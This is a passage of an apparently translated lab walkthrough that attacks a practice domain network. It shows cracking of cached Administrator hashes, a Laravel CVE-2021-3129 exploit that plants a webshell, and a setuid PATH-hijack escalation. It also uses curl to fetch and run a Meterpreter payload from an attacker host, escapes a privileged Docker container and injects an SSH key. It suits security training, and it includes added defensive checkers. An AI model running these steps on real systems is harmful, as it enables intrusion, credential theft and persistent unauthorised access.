Local name : PC1 ( S-1-5-21-1982601180-2087634876-2293013296 )
Domain name : WHOAMIANONY ( S-1-5-21-1315137663-3706837544-1429009142 )
Domain FQDN : whoamianony.org
Policy subsystem is : 1.11
LSA Key(s) : 1, default {c4f0262f-f9ba-5833-89e5-1264beb97c37}
[00] {c4f0262f-f9ba-5833-89e5-1264beb97c37} 12ec51d5510d2e28b5f273a98a547e21ceec081867af5348f219b08215f27558
* Iteration is set to default (10240)
[NL$1 - 2021/2/22 18:53:27]
RID : 00000458 (1112)
User : WHOAMIANONY\bunny
MsCacheV2 : 00dd17d44798d1ac5f335365db696d1e
[NL$2 - 2025/9/18 17:05:27]
RID : 000001f4 (500)
User : WHOAMIANONY\Administrator
MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
The interesting entry:
[NL$2 - 2025/9/18 17:05:27]
RID : 000001f4 (500)
User : WHOAMIANONY\Administrator
MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
RID 500 is the fixed RID of the built-in domain Administrator account in Active Directory (the Administrator account of any domain has RID 500, whatever it has been renamed to).
MsCacheV2 is a Domain Cached Credentials v2 (DCC2) hash: the cached verifier Windows keeps so that domain users can still log on when no DC is reachable.
| RID | Well-known principal |
|---|---|
| 500 | Administrator (built-in administrator) |
| 501 | Guest |
| 502 | krbtgt (exists only in a domain) |
| 512 | Domain Admins group |
What we now know:
- Username: Administrator
- MsCacheV2: 2f44261182b156fe4e2cb03b39925b72
A DCC2 hash cannot be used to log in directly: it is a salted PBKDF2 derivation of the NTLM hash, so it cannot be passed, only cracked. We can try cracking it locally (you can skip this; see the "big picture" note below):
bash
echo '$DCC2$10240#Administrator#2f44261182b156fe4e2cb03b39925b72' > /tmp/dcc2.hash
hashcat -m 2100 /tmp/dcc2.hash /usr/share/wordlists/rockyou.txt
Big picture: lab passwords are usually simple, but this one, Whoami2021, is not in rockyou, so the brute-force does not find it......
4. Adjusting the approach
Update the lab diagram again:

Are there other machines in the domain?
Check PC1's ARP cache:
C:\Windows\system32>arp -a
arp -a
Interface: 192.168.52.30 --- 0xb
Internet Address Physical Address Type
192.168.52.10 00-50-56-b1-f7-eb dynamic
192.168.52.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
Interface: 169.254.129.186 --- 0x16
Internet Address Physical Address Type
169.254.255.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Interface: 192.168.93.20 --- 0x17
Internet Address Physical Address Type
192.168.93.30 00-50-56-b1-03-a1 dynamic
192.168.93.40 00-50-56-b1-a1-a3 dynamic
192.168.93.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
Another host shows up:

MSF's scanning modules returned nothing at all, most likely because of a firewall, so we turn to host 192.168.52.20 first.
VII. 192.168.52.20
1. CVE-2021-3129
Port 8000 on 192.168.52.20 serves HTTP, and the earlier scan flagged it as possibly vulnerable to:
poc-yaml-laravel-cve-2021-3129
A quick search found an automated exploit script on GitHub:
https://github.com/ajisai-babu/CVE-2021-3129-exp
Clone it locally:
git clone https://github.com/ajisai-babu/CVE-2021-3129-exp.git
Run the script as described in its README:
❯ proxychains python CVE-2021-3129.py -u http://192.168.52.20:8000 --exp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[✅]检测到漏洞![🚩]url: http://192.168.52.20:8000 [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
[OK] 成功写入webshell, 访问地址 http://192.168.52.20:8000/shell.php , 密码 whoami
Note: proxychains is used here so that the command's traffic goes through the SOCKS proxy on 127.0.0.1:1080 set up earlier; the tool itself is not covered here, its usage is easy to look up.
Take over the shell with AntSword (any other webshell manager works too); first configure AntSword's proxy:


Remember to click Save.
Add the shell:


Takeover successful.
2. Information gathering
www-data has little privilege, and some common network commands are missing:
bash
(www-data:/var/www/html) $ ip addr
/bin/sh: 1: ip: not found
(www-data:/var/www/html) $ ifconfig
/bin/sh: 1: ifconfig: not found
Some information can still be collected:
(www-data:/var/www/html) $ hostname && cat /etc/issue && uname -a && cat /etc/hosts
8e172820ac78
Debian GNU/Linux 10 \n \l
Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 GNU/Linux
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 8e172820ac78
(www-data:/var/www/html) $ cat /proc/version
Linux version 4.4.0-142-generic (buildd@lcy01-amd64-006) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4) ) #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019
(www-data:/var/www/html) $ cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
From this we can tell the host is actually running inside a Docker container.
Why?
Several typical fingerprints of a Docker deployment:
- hostname printed 8e172820ac78, a 12-character hex string. By default Docker sets the container hostname to the first 12 characters of the container ID; a physical machine or ordinary VM rarely has such a random short hex hostname.
- /etc/hosts explicitly maps 172.17.0.2 to that hostname, and 172.17.0.0/16 is the standard subnet of Docker's default bridge network (containers are usually assigned addresses starting at 172.17.0.2).
Beyond these fingerprints there is one decisive piece of evidence, the mismatch between kernel and OS version: /etc/os-release and /etc/issue say Debian 10 (buster), but uname -a and /proc/version show a 4.4.0-142-generic kernel built for the Ubuntu 14.04 series.
A container has no kernel of its own; it shares the host's. So this is a Debian 10 container on a host running an Ubuntu-series 4.4.0-142 kernel.
Also, look at the process tree:
(www-data:/var/www/html) $ ps -p 1 -f
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 00:38 ? 00:00:00 apache2 -DFOREGROUND
This is clearly not a normal host either.
On an ordinary Linux host PID 1 is systemd, init or similar; in a container it is often sh, bash, apache2, nginx, php-fpm, python, the application's start script, or a lightweight supervisor.
Two further quick checks: the file /.dockerenv, which Docker creates in every container, and /proc/1/cgroup, which on a cgroup v1 host such as this 4.4 kernel names the docker cgroup and the container ID.
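The fingerprints above, folded into a small Python checker as an added example (not code from the original writeup): feed it the hostname, /etc/hosts, /etc/os-release, /proc/version and the PID 1 command line and it reports which Docker indicators apply. The two snapshots are constructed, one from the outputs on this page and one for a hypothetical plain Ubuntu VM on the same kernel for contrast; the indicator names and the distro token list are my own.

```python
import ipaddress
import re

DOCKER_DEFAULT_BRIDGE = ipaddress.ip_network("172.17.0.0/16")   # docker0's default subnet
INIT_NAMES = {"systemd", "init", "upstart", "openrc-init", "runit"}
DISTRO_TOKENS = ("ubuntu", "debian", "fedora", "centos", "alpine")


def _os_release_id(text: str) -> str:
    m = re.search(r'^ID="?([^"\n]+?)"?\s*$', text, re.M)
    return m.group(1).lower() if m else ""


def container_indicators(snapshot: dict) -> list:
    """Return the Docker fingerprints present in a snapshot with keys
    hostname, etc_hosts, os_release, proc_version and pid1_cmd (all plain text)."""
    found = []
    host = snapshot["hostname"].strip()
    # 1. Docker names the container after the first 12 hex characters of its ID.
    if re.fullmatch(r"[0-9a-f]{12}", host):
        found.append("short-hex-hostname")
    # 2. Docker writes "<bridge address> <hostname>" into the container's /etc/hosts.
    for line in snapshot["etc_hosts"].splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2 or host not in fields[1:]:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        if addr in DOCKER_DEFAULT_BRIDGE:
            found.append("docker-bridge-address")
            break
    # 3. A container runs the host's kernel, so the distro named in /proc/version
    #    can disagree with the user-land distro in /etc/os-release.
    os_id = _os_release_id(snapshot["os_release"])
    kernel_distros = {t for t in DISTRO_TOKENS if t in snapshot["proc_version"].lower()}
    if os_id and kernel_distros and os_id not in kernel_distros:
        found.append("kernel-userland-mismatch")
    # 4. PID 1 is the workload itself rather than an init system.
    pid1 = snapshot["pid1_cmd"].split()[0].rsplit("/", 1)[-1]
    if pid1 not in INIT_NAMES:
        found.append("non-init-pid1")
    return found


# Constructed snapshot assembled from the outputs shown on this page.
CONTAINER = {
    "hostname": "8e172820ac78",
    "etc_hosts": "127.0.0.1 localhost\n::1 localhost ip6-localhost ip6-loopback\n172.17.0.2 8e172820ac78\n",
    "os_release": 'PRETTY_NAME="Debian GNU/Linux 10 (buster)"\nNAME="Debian GNU/Linux"\nVERSION_ID="10"\nID=debian\n',
    "proc_version": "Linux version 4.4.0-142-generic (buildd@lcy01-amd64-006) "
                    "(gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4) ) #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019",
    "pid1_cmd": "apache2 -DFOREGROUND",
}
# Constructed snapshot of a hypothetical ordinary Ubuntu VM on the same kernel, for contrast.
BARE_VM = {
    "hostname": "ubuntu",
    "etc_hosts": "127.0.0.1 localhost\n127.0.1.1 ubuntu\n",
    "os_release": 'NAME="Ubuntu"\nVERSION_ID="14.04"\nID=ubuntu\nID_LIKE=debian\n',
    "proc_version": CONTAINER["proc_version"],
    "pid1_cmd": "/sbin/init",
}

if __name__ == "__main__":
    print("container:", container_indicators(CONTAINER))
    print("bare VM:  ", container_indicators(BARE_VM))
```

None of the four indicators is proof on its own (a hardened image can set a normal hostname, and a VM can run a workload as PID 1); together, and combined with /.dockerenv, they are as reliable as it gets from inside an unprivileged shell.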
3. Privilege escalation
First try escalating inside the container.
Check what sudo rights the user has:
bash
sudo -l
Output:
(www-data:/var/www/html) $ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified
No luck: the error means sudo wanted to prompt for a password and had no terminal to do so. Since sudo -l lists entries without asking for a password as soon as at least one of them is NOPASSWD, this also tells us www-data has no passwordless sudo entries, and we do not know its password.
Look for SUID binaries:
bash
find / -type f -perm -04000 -ls 2>/dev/null
(www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
One obvious suspect:
/home/jobs/shell
Reason: everything else in the list is a stock setuid binary from the base image, while this one is a setuid-root executable named shell in a non-standard home directory (jobs).
Enter the directory and list its contents:
(www-data:/var/www/html) $ cd /home/jobs
(www-data:/home/jobs) $ ls
demo.c
shell
A fair guess is that demo.c is the source shell was compiled from. Check:
bash
(www-data:/home/jobs) $ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("ps");
}
It runs a system command through system(), and by a relative name (ps), so a PATH hijack may be possible: system() hands the string to /bin/sh, which resolves a bare command name through the caller's PATH, and the binary does nothing to reset PATH before doing so.
Verify that shell really is the compiled demo.c by running it:
bash
(www-data:/home/jobs) $ ./shell
PID TTY TIME CMD
1 ? 00:00:00 apache2
125 ? 00:00:00 shell
126 ? 00:00:00 sh
127 ? 00:00:00 ps
The process list appears, as expected.
If you get no output, run it a few more times; this is a known quirk of webshells (caching, time limits and so on).
Find writable directories:
bash
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
(www-data:/home/jobs) $ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
dev/fd
dev/full
dev/fuse
dev/mqueue
dev/net
dev/null
dev/ptmx
dev/pts
dev/random
dev/shm
dev/stderr
dev/stdout
dev/tty
dev/urandom
dev/zero
lib/systemd
run/apache2
run/lock
sys/fs
tmp
var/cache
var/lock
var/log
var/tmp
var/www
I chose /tmp. Create a fake ps there:
bash
(www-data:/home/jobs) $ printf '#!/bin/bash\n/bin/bash -c whoami\n' > /tmp/ps
Make it executable:
(www-data:/home/jobs) $ chmod +x /tmp/ps
Prepend the directory to PATH (it must come before the existing entries) and run shell:
bash
(www-data:/home/jobs) $ export PATH=/tmp:$PATH && ./shell
root
The PATH hijack works!
Since we only have a webshell at this point, we cannot get a root shell back this way; the above merely verifies that the PATH hijack succeeds.
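The two decisions of this section, which SUID binary is worth a look and why a relative command name inside it is exploitable, as an added Python example (not part of the original writeup). It filters the find output shown above against a baseline of stock setuid binaries and then replays the shell's PATH lookup for ps under the attacker's PATH, under a PATH the binary should have reset itself, and with an absolute path. The baseline set, the fake filesystem EXECUTABLES and the two PATH strings are my constructions.

```python
import posixpath

# Setuid-root binaries a stock Debian/Ubuntu base image ships; anything outside this set deserves a look.
BASELINE_SUID = {
    "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chfn",
    "/usr/bin/sudo", "/bin/mount", "/bin/su", "/bin/umount",
    "/usr/bin/mount", "/usr/bin/su", "/usr/bin/umount",          # merged-/usr layouts
}


def parse_find_ls(output: str) -> list:
    """Parse `find ... -ls` lines into (mode, owner, path). -ls prints
    inode blocks mode links owner group size month day year|time path."""
    rows = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) >= 11:
            rows.append((fields[2], fields[4], " ".join(fields[10:])))
    return rows


def suspicious_suid(output: str) -> list:
    """Setuid-root files that are not part of the known baseline."""
    return [path for mode, owner, path in parse_find_ls(output)
            if mode[3] in "sS" and owner == "root" and path not in BASELINE_SUID]


def resolve(command: str, path: str, executables: set):
    """How /bin/sh (and execvp) locate a command: a name containing '/' is used as is,
    otherwise the first PATH entry that contains the name wins."""
    if "/" in command:
        return command if command in executables else None
    for directory in path.split(":"):
        candidate = posixpath.join(directory or ".", command)
        if candidate in executables:
            return candidate
    return None


# Constructed copy of the find output shown on this page.
FIND_OUTPUT = """\
25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
"""
# Constructed view of the executables that matter: the real ps and our fake one in writable /tmp.
EXECUTABLES = {"/bin/ps", "/tmp/ps"}
HIJACK_PATH = "/tmp:/usr/local/bin:/usr/bin:/bin"                            # what `export PATH=/tmp:$PATH` produces
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"   # a PATH the binary should set itself

if __name__ == "__main__":
    print("suspicious:", suspicious_suid(FIND_OUTPUT))
    print('system("ps") with attacker PATH ->', resolve("ps", HIJACK_PATH, EXECUTABLES))
    print('system("ps") with reset PATH    ->', resolve("ps", SAFE_PATH, EXECUTABLES))
    print('system("/bin/ps")               ->', resolve("/bin/ps", HIJACK_PATH, EXECUTABLES))
```

The fix on the binary side is what SAFE_PATH models: reset PATH (or call the command by absolute path) before system(), or better, avoid system() in a setuid program altogether; sudo's secure_path exists for exactly this reason.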
4. Meterpreter
A webshell gives no interactive root shell, so the plan is to bring the box into MSF.
First set up a reverse tunnel, which requires a change to the SSH server configuration on the jump host.

Log in:
ssh -i target root@192.168.111.20
Edit the file:
vim /etc/ssh/sshd_config
Find the line:
#GatewayPorts no
Uncomment it and change the value to yes:
GatewayPorts yes
Restart the SSH service:
bash
systemctl restart sshd
Log out, and on Kali set up the reverse tunnel:
ssh -i target -R 0.0.0.0:4444:localhost:4444 -R 0.0.0.0:6666:localhost:6666 root@192.168.111.20 -N
This walkthrough is long, so as a reminder: target here is the private key file. GatewayPorts yes is needed because without it sshd binds -R listeners to 127.0.0.1 only, and the container would not be able to reach them on the jump host's 192.168.52.10 address.
Start MSF:
bash
msfconsole
Select the module:
exploit/multi/script/web_delivery
Options:
set target Linux
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.52.10
set SRVPORT 6666
Run the module:

It prints a Linux one-liner starting with wget, but wget does not exist on the target. curl, it turns out, is available and can download the file just as well:
cd /tmp && curl -O http://192.168.52.10:6666/XTUK5wgCV
Pick a directory we can both write to and execute from.
After the download, make it executable:
chmod +x XTUK5wgCV
Then use the privilege escalation found earlier to run it as root, which gives a root meterpreter:
(www-data:/tmp) $ printf '#!/bin/bash\n/bin/bash -c /tmp/XTUK5wgCV\n' > /tmp/ps
(www-data:/tmp) $ export PATH=/tmp:$PATH && /home/jobs/shell
Once it runs, a new session shows up in MSF (session 2 in my case); interact with it:
sessions -i 2
Check privileges:

5. Container escape
There is nothing useful in the container, so try to escape.
The easiest and most obvious route is the privileged container escape.
First confirm that the container runs in privileged mode (the precondition):
bash
lsblk
fdisk -l 2>/dev/null
Output:
root@8e172820ac78:/tmp# lsblk
lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 10G 0 disk
|-sda1 8:1 0 8G 0 part /etc/hosts
|-sda2 8:2 0 1K 0 part
`-sda5 8:5 0 2G 0 part [SWAP]
root@8e172820ac78:/tmp# fdisk -l 2>/dev/null
fdisk -l 2>/dev/null
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: Virtual disk
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9
Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 16779263 16777216 8G 83 Linux
/dev/sda2 16781310 20969471 4188162 2G 5 Extended
/dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris
First, the host's entire disk is visible as /dev/sda. An unprivileged container has no block device nodes in /dev at all, so the fact that lsblk and fdisk see the disk already points to --privileged (or at least an explicitly exposed device).
Second, the lsblk MOUNTPOINT column shows /etc/hosts on sda1: Docker bind-mounts the per-container hosts file it generates under /var/lib/docker on the host's root filesystem into the container, so sda1 is the host's root partition.
A more direct confirmation is to read CapEff from /proc/self/status: a privileged container holds every capability (on this 4.4 kernel the mask is 0000003fffffffff), and CAP_SYS_ADMIN is what the mount(2) below requires.
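An added example (not from the original writeup) that reads CapEff from /proc/self/status and decodes it, which is a more direct privileged-mode check than looking for block devices. The two status excerpts are constructed: one with the full 38-capability mask of a --privileged container on a 4.4 kernel, one with Docker's default capability set 00000000a80425fb; the function names are my own. On the target itself nothing more than `grep CapEff /proc/self/status` has to run.

```python
# Capability bit numbers from <linux/capability.h>; list index = bit position in CapEff.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK",
    "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE",
    "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE",
    "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG",
    "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def parse_cap_eff(status_text: str) -> int:
    """Pull the effective capability mask out of /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line in status text")


def decode_caps(mask: int) -> list:
    """Expand a capability mask into names, like `capsh --decode` does."""
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def escape_assessment(mask: int) -> dict:
    """What the mask means for the disk-mount escape used on this page."""
    caps = set(decode_caps(mask))
    # --privileged grants every capability the kernel knows, so the mask is 2**n - 1 with
    # n = number of capabilities in that kernel (38 on 4.4, 41 on 5.9 and later).
    all_caps = mask > 0 and (mask + 1) & mask == 0 and mask.bit_length() >= 38
    return {
        "privileged": all_caps,
        "can_mount": "CAP_SYS_ADMIN" in caps,        # mount(2) requires CAP_SYS_ADMIN
        "can_mknod": "CAP_MKNOD" in caps,            # recreate /dev/sda1 if the node is missing
        "can_chroot": "CAP_SYS_CHROOT" in caps,
    }


# Constructed /proc/self/status excerpts: a --privileged container on a 38-capability kernel
# (such as the page's 4.4.0), and a container with Docker's default capability set.
PRIVILEGED_STATUS = "Name:\tbash\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\nCapBnd:\t0000003fffffffff\n"
DEFAULT_STATUS = "Name:\tbash\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"

if __name__ == "__main__":
    for label, text in (("privileged", PRIVILEGED_STATUS), ("default", DEFAULT_STATUS)):
        mask = parse_cap_eff(text)
        print(f"{label}: CapEff={mask:016x} caps={len(decode_caps(mask))} {escape_assessment(mask)}")
```

A default container keeps CAP_MKNOD and CAP_SYS_CHROOT but lacks CAP_SYS_ADMIN, so even with a device node it could not mount the partition; the full mask is what makes the mount-and-chroot escape below trivial.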
Create a directory on which to mount the host's real root filesystem:
bash
mkdir /hack
Output:
root@8e172820ac78:/tmp# mkdir /hack
mkdir /hack
mkdir: cannot create directory '/hack': File exists
The directory already exists, so just mount:
bash
mount /dev/sda1 /hack
Once mounted, /hack is the host's complete root filesystem (for example /hack/etc/passwd is the host's /etc/passwd).
Translating paths this way is tedious and error-prone; use chroot to switch the root directory instead:
chroot /hack
Now / is what used to be /hack.
Start a shell from the host filesystem:
bash
/bin/bash
Verify the switch worked:
bash
cat /etc/hostname
Output:
ubuntu
The escape worked, but only at the filesystem level: we are still inside the container's network (and PID) namespace, as ip addr shows (the ip binary now comes from the host filesystem):
bash
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
6. Getting root on the host
The earlier scan showed port 22 open on the host, so repeat the Redis trick: write our SSH public key into the host's authorized_keys (now reachable through the chroot) and connect over SSH to get a full root shell on the host itself.
Locate the public key generated earlier and print it:
bash
❯ cat target.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
The host has neither the directory nor the file yet, so create the directory first:
mkdir -p /root/.ssh
Write the key:
cat > /root/.ssh/authorized_keys << 'EOF'
ssh-rsa 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 zyf@kali
EOF
Set the permissions sshd expects:
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
Try connecting:
bash
proxychains ssh -i target root@192.168.52.20
It still asks for a password. Check the debug output:
proxychains ssh -i target root@192.168.52.20 -vvv
The log shows:
debug1: send_pubkey_test: no mutual signature algorithm
Cause: an OpenSSH version mismatch. The target host runs OpenSSH 6.6.1 while my Kali client is OpenSSH 10.2. Clients since OpenSSH 8.8 disable the ssh-rsa signature algorithm (RSA with SHA-1) by default, and a 6.6.1 server knows nothing of rsa-sha2-256/512 (added in 7.2), so the two sides have no signature algorithm in common and the client skips public key authentication and falls back to password authentication. An ed25519 key would have avoided this, since OpenSSH has supported it since 6.5.
Re-enable the algorithm for this connection:
bash
proxychains ssh -i target root@192.168.52.20 -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa
Success:
root@ubuntu:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:7e:66 brd ff:ff:ff:ff:ff:ff
inet 192.168.52.20/24 brd 192.168.52.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:7e66/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:4a:b8 brd ff:ff:ff:ff:ff:ff
inet 192.168.93.10/24 brd 192.168.93.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:4ab8/64 scope link
valid_lft forever preferred_lft forever
4: br-1d665e13ee58: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:a8:01:1e:34 brd ff:ff:ff:ff:ff:ff
inet 172.20.0.1/16 brd 172.20.255.255 scope global br-1d665e13ee58
valid_lft forever preferred_lft forever
5: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:29:fc:b3:bf brd ff:ff:ff:ff:ff:ff
